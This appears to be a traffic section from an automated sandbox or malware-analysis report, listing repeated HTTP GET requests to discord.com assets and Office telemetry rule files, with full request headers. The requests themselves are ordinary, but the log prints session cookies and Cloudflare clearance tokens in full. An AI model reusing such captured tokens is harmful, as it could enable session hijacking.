                          Source: global trafficHTTP traffic detected: GET /assets/3c99eb87778b9ed038d5.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js? HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/822c37e354b4a39dd6ca.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/f587337433e36ce917bd.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/9390b4ecf309e4a58642.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/8e217faefc0006e5a018.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/52015caea7357a7a60a9.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/771babda7e3dcee4f677.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/ed216fb74081c12ffece.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/05bd1eb5dea5ee3387f4.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/2597d11c1e039607373e.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/a5ec2b74d0cc337d4481.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/d4dcfe8e106a8072717f.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/5430e9964fe8364e084d.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/8e73d00e4bfe422e HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/ab03f7053698d417194c.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/b54790681a89c77f55ad.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/3c99eb87778b9ed038d5.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/f587337433e36ce917bd.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/410a2166a48c9e482e2a.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/9017b7062734e72bb476.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
